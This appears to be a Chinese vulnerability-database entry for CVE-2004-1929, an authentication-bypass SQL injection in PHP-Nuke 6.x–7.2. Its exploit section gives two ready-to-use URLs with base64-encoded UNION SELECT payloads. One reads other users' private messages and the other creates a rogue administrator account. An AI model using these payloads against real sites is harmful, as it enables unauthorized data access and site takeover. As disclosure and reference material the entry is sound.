PHP-Nuke Multiple SQL注入漏洞

28次阅读
没有评论

PHP-Nuke Multiple SQL注入漏洞

漏洞ID 1107871 漏洞类型 SQL注入
发布时间 2004-04-13 更新时间 2005-10-20
PHP-Nuke Multiple SQL注入漏洞CVE编号 CVE-2004-1929
PHP-Nuke Multiple SQL注入漏洞CNNVD-ID CNNVD-200404-022
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23998
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-022
|漏洞详情
PHP-Nuke6.x到7.2版本functions.php中的bblogin函数存在SQL注入漏洞。远程攻击者可以通过向user参数注入base64-encodedSQL代码绕过验证以及获得权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/10135/info 

Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.

As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
|参考资料

来源:XF
名称:phpnuke-bypass-authentication(15839)
链接:http://xforce.iss.net/xforce/xfdb/15839
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id;=17
来源:BID
名称:10135
链接:http://www.securityfocus.com/bid/10135
来源:SECUNIA
名称:11347
链接:http://secunia.com/advisories/11347
来源:BUGTRAQ
名称:20040412[waraxe-2004-SA#017-User-levelauthenticationbypassinphpnuke6.x-7.2]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108180111826852&w;=2

相关推荐: Watchguard Firebox II firewall权限提升漏洞

Watchguard Firebox II firewall权限提升漏洞 漏洞ID 1205850 漏洞类型 未知 发布时间 2001-03-26 更新时间 2005-05-02 CVE编号 CVE-2001-0203 CNNVD-ID CNNVD-20010…

正文完
 0